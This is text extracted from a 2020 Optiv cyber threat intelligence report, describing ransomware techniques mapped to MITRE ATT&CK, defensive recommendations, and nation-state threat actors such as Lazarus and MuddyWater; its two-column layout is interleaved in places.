to thwart malware attacks (JEA) to allow delegated control;
Remove use of older PowerShell
2.0, which has been deprecated, and
enable PowerShell transcription
logging and Script Block Logging
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 191 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
MALWARE: RANSOMWARE Threat actors may also stop or disable
services on a system to render those services
Optiv’s gTIC team (using the ThreatDNA unavailable to legitimate users. Stopping
platform) found that ransomware critical services can inhibit or halt responses
was an influential topic throughout to an incident or aid the adversary’s
the past year in circles outside of overall objectives to cause damage to the
the information security industry. environment. Adversaries may accomplish
this by disabling individual services of
Numerous industry leaders and high importance to an organization,
such as MSExchangeIS, which will make
organizations saw a drastic
Microsoft Exchange content inaccessible.
increase in ransomware activity, In some cases, adversaries may stop
as reported in the news and or disable any or all services to render
incident response reports. systems unusable. Services may not allow
for modification of their data stores while
running. Adversaries may stop services to
Many ransomware concepts can be induce data destruction or encrypt data
explained by reviewing what is known about for impact on the data stores of services
the MITRE ATT&CK® for Enterprise patterns like Exchange and Microsoft SQL Server.
used by most ransomware families. Knowing
more about how ransomware works will Attackers can fake the parent process
help identify and address vulnerabilities. identifier (PPID) of a new process to evade
process-monitoring defenses or to elevate
Adversaries may encrypt data on target privileges. New processes are typically
systems or on large numbers of systems in spawned directly from their parent, or call,
a network to interrupt availability to system process unless explicitly specified. One way
resources. They can attempt to render of explicitly assigning the PPID of a new
stored data inaccessible by encrypting process is via the CreateProcess API call,
files or data on local and remote drives which supports a parameter that defines
and withholding access to a decryption which PPID to use. This functionality is used
key. This may be done to extract monetary by Windows features such as user account
compensation from a victim in exchange for control (UAC) to correctly set the PPID after
decryption or a decryption key to render a requested elevated process is spawned by
data permanently inaccessible in cases SYSTEM (typically via svchost.exe or consent.
where the key is not saved or transmitted. exe) rather than the current user context.
In the case of ransomware, common user Adversaries may abuse these mechanisms
files like Microsoft Office documents, PDFs, to evade defenses, such as those blocking
images, videos, audio, text and source code processes spawning directly from Office
files are typically encrypted. In some cases, documents, and analysis targeting unusual/
adversaries may encrypt critical system potentially malicious parent-child process
files, disk partitions and the master boot relationships, such as spoofing the PPID of
record (MBR). To maximize the impact on the PowerShell or Rundll32 to be explorer.exe
target organization, malware designed for rather than an Office document delivered
encrypting data may have worm-like features as part of spear phishing attachment. These
to propagate across a network by leveraging spoofing techniques can be executed
other attack techniques like valid accounts. via Visual Basic for Applications (VBA)
scripting within a malicious Microsoft
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 201 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Office document or any code that can Threat actors can shutdown/reboot
perform execution through an API. systems to interrupt access to, or aid in the
destruction of, those systems. Operating
Explicitly assigning the PPID may also enable systems may contain commands to initiate
privilege escalation, given appropriate a shutdown/reboot of a machine. In
access rights to the parent process. For some cases, these commands also may
example, an adversary in a privileged user be used to initiate a shutdown/reboot
space, such as an administrator, may spawn of a remote computer. Shutting down or
a new process and assign the parent as rebooting systems may disrupt access to
a process running as SYSTEM (such as computer resources for legitimate users.
lsass.exe), causing the new process to be Adversaries may attempt to shutdown/
elevated via the inherited access token. reboot a system after impacting it in other
ways, such as a disk structure wipe, or
Adversaries commonly use domain inhibiting system recovery, to hasten the
generation algorithms (DGAs) to procedurally intended effects on system availability.
generate domain names for command and
control communication, and for other uses Attackers also interrupt the availability
such as malicious application distribution. of system resources by inhibiting access
DGAs drastically increase the difficulty for to accounts utilized by legitimate users.
defenders to block, track or take over the Accounts may be deleted, locked or
command and control channel, as there manipulated. Adversaries also may
potentially can be thousands of domains subsequently log off and/or reboot boxes
that malware can check for instructions. to set malicious changes into place.
RE C O M ME N D AT I O NS
Consider implementing IT recovery Research trusted sources for public
plans that contain procedures for releases of decryptor tools or keys to
consistently testing data backups reverse the effects of ransomware
that can be used to restore critical
data. In some cases, the method to Identify potentially malicious
decrypt files affected by a ransomware software and audit and/or block
campaign is released to the public it by using whitelisting tools
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 211 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Hybrid
Threat Actors
Hybrid threat actors present unique
challenges because their classification
is not always rigid. Common classes
of hybrid threat actors include nation-
states, cybercriminals, hacktivists and
others described below. These actors may
masquerade as a certain type to hide their
true agendas. Or, threat actors may belong
to two or more classes, switching between
them as their priorities change.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 221 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
NATION-STATES » North Korea. The North Korean
government maintains a firm grip over its
Nation-state threat actors are often thought domestic cyber-threat actors. Its efforts
to possess resources and capabilities above are aided by the state’s indoctrination
and beyond the average threat actor. They methods so that technical skills are
have unique relationships to other types of developed among those serving the
threat actors, and they view cyber-threat government. When compared with other
actors within their boundaries according to nation-states, North Korea’s interests have
philosophy and law. Citizens in a country had a greater focus on monetary gain
are subject to the laws, regulations and brought on by the country’s economic
governance of the nation-states in which isolation and strict international sanctions
they reside. Similarly, nation-state threat imposed on the country. In addition
actors are not excluded from the laws to financially motivated activity, North
and regulations of their own countries Korea also engages in destructive
and therefore cannot act with impunity. cyber activity against South Korean
media and targets other foreign media
Analysts from Optiv and Digital Shadows institutions that have portrayed the
weigh in below on prominent nation- North Korean regime in a negative light.
states that engage in cyber-threat activity These actions were highlighted in cyber
and use their positions to integrate attacks carried out against international
domestic, non-nation-state threat actors banks and cryptocurrency exchanges
into their offensive cyber policies. that were linked to the North Korean
state. North Korea has been linked to
» China. China prefers to indoctrinate the infamous WannaCry attack in 2017.
cyber-threat actors so they willingly The Lazarus Group/HIDDEN COBRA,
support the state. Feelings of patriotism an advanced persistent threat group,
and common achievement drive has been linked to several high-profile
actors to cooperate and follow nation- cyber attacks including the 2014 Sony
state direction. China instills, and to Motion Pictures breach as well as attacks
an extent, enforces, a deep sense of against South Korean critical infrastructure
loyalty to country through schooling and media/financial institutions.
and the military. Groups may be directly
associated with the military (APT1/ Digital Shadows analysts found that
Comment Crew), or they attract and the Lazarus Group was particularly
maintain followers and members (Honker active in 2019 – and well known for
Union) via an agenda that focuses on conducting operations for financial gain
patriotism and duty to country. China’s to raise government revenue. This is
recurring Five-Year Plan, which lays out unusual for nation-state groups, which
key and strategic-level objectives related typically are focused on espionage
to economic growth, global influence, operations used to gather sensitive
investments and culture, directs and political and military information. The
influences the sentiment and actions majority of Lazarus Group’s attacks on
of domestic cyber operations. China cryptocurrency exchanges took place
maintains a robust cyber capability in Asia – South Korea in particular.
within both its intelligence service,
the Ministry of State Security (MSS)
and the People’s Liberation Army.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 231 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
2 0 1 9 S TAT E O F N AT I O N
THRE AT A C T O R S
RUSSIA NORTH KOREA
allows cybercriminals to have had a greater focus
conduct their activities as on monetary gain brought
long as they target entities on by the country’s
outside of Russia’s borders economic isolation and
and accept cyber direction strict international sanctions
from state sources. imposed on the country.
IRAN CHINA
actively cultivates and maintains a robust cyber
recruits non-nation- capability within both its
state actors. intelligence service, the
Ministry of State Security
(MSS) and the People’s
Liberation Army.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 241 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Cryptocurrency-related organizations Reporting suggests that by late 2018,
remained a popular target for Lazarus. In Iranian government officials took a
addition to targeting multiple established stricter stance on its independent actors
cryptocurrency exchanges, the group also to reel in offensive cyber operations
was linked to an operation that promoted under tighter government control and
a fake cryptocurrency trading program guidance. Throughout 2019, there was
and installed a backdoor on a victim’s a notable increase in aggressive Iranian
device when downloaded. Lazarus also activity that further degraded relations
conducted more traditional espionage between Iran and the West. Iranian state-
operations. For example, the group was linked hacker groups continued to remain
linked to an operation targeting one of focused on conducting disruptive cyber
India’s nuclear power plants, Kudankulam attacks and spreading disinformation
Nuclear Power Plant (KNPP), in October and pro-Iranian propaganda.12 It’s
2019. The Dtrack trojan used in the uncertain what the long-term response
attack was developed by the group. from Iranian groups will be in light of the
Although Windows remains the target strike that killed Islamic Revolutionary
operating system of choice for most Guard Corps (IRGC) commander General
threat actors, a notable trend was Qasem Soleimani in January 2020.
Lazarus’ targeting of Mac OSX systems. According to Digital Shadows research,
South Korean OSX users were targeted MuddyWater, an Iranian state-associated
through macro-embedded documents threat actor, was most active in the first
that would go on to execute a malicious half of 2019. But throughout the year,
PowerShell script. Lazarus often targeted the group used many new or previously
both Windows and OSX users through unobserved tools to conduct espionage
the separation of infection procedures operations targeting various sectors
as part of the same operation. and regions, including the Middle East,
Asia, Europe and North America. One
» Iran. Iranian nation-state actors actively campaign used a previously unseen
cultivate and recruit non-nation-state PowerShell-based backdoor called
actors in addition to continually building POWERSTATS v3 to target a university in
out their paramilitary cyber units such as Jordan and a government entity in Turkey.
APT33 and OilRig. Many Iranian threat The multi-staged backdoor exfiltrated
actors carry out their activities by self- information and staged a second-stage
driven initiative as well as by suspected attack by obtaining additional payloads
guidance from Iranian government from MuddyWater’s command and
and military organizations. Hacktivist control (C2) server. MuddyWater also
groups, whose members sometimes expanded its targets to include Android
have loose ties to higher education and devices. Mobile malware deployed by the
military institutions, often are driven group enabled it to gather information
by the hope and expectation of being – including contact lists, call logs, SMS
rewarded or recruited by special units text messages and Android geolocation
within Iran’s military and paramilitary information – from an infected device.
groups that are involved in information
security and cyber activity. The Basij,
a volunteer corps, recruits for various
domestic and national-level security
initiatives, including cyber operations.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 251 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
In the second half of 2019, there was a »
notable reduction in public reporting
on MuddyWater, although it is possible »
that campaigns occurred in the second »
half of the year but were not reported.
Similar to reporting of APT34 activity, a »
Telegram user leaked information on the
threat actor in May 2019, including images »MuddyWater
of both MuddyWater C2 server source
»In 2019, the Iranian state-associated threat
code and the back end of the C2 servers. actor MuddyWater targeted government
Given the sophistication of the group, it »and telecommunication organizations in
is unlikely that this would have severely the countries surrounding Iran. Phishing
disrupted their operations. It is more likely »emails sent to targets contained Word
that the lack of reporting was caused documents that, once opened, displayed
»
by reporting biases. Cyber-espionage an error message to prompt a target into
campaigns often are reported either in »downloading a file. If a user proceeded,
retrospect or not reported until many the malicious file established a connection
months or years after they take place. »with a C2 server that had links to previous
MuddyWater attacks. The file exploited
» Russia. The Russian state controls and
CVE-2017-0199 (a vulnerability previously
coordinates cyber-threat activity with
exploited by the Iranian state-associated
its non-nation-state actors via coercion.
threat actor APT34) and ran a PowerShell
Cybercriminals are allowed to conduct their
script. The script obtained and exfiltrated
activities as long as they target entities
information about the compromised
outside of Russia’s borders and accept
system to the MuddyWater C2 server. The
cyber direction from state sources. Failure
group also deployed additional, although
to do so can result in criminal prosecution.
unspecified, payloads onto compromised
Russia is suspected of repurposing
systems.
domestic hackers and threat actors that
are embroiled in legal issues stemming
Because CVE-2017-0199 was used previously
from past cyber activities. These actors
by APT34, it is possible that the two threat
may be leveraged by government security
actors are collaborating with Iranian
and/or intelligence bureaus to carry out
state-associated groups known to share
activities that benefit the state’s agenda.
infrastructure. Telecommunication
organizations are an attractive target for
espionage operations because they are part
of a country’s critical infrastructure and
form critical nodes in a country’s network.
By gaining access to telecommunication
organizations, a threat actor increases its
ability to intercept and collect network
traffic within a target country.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 26You can also read
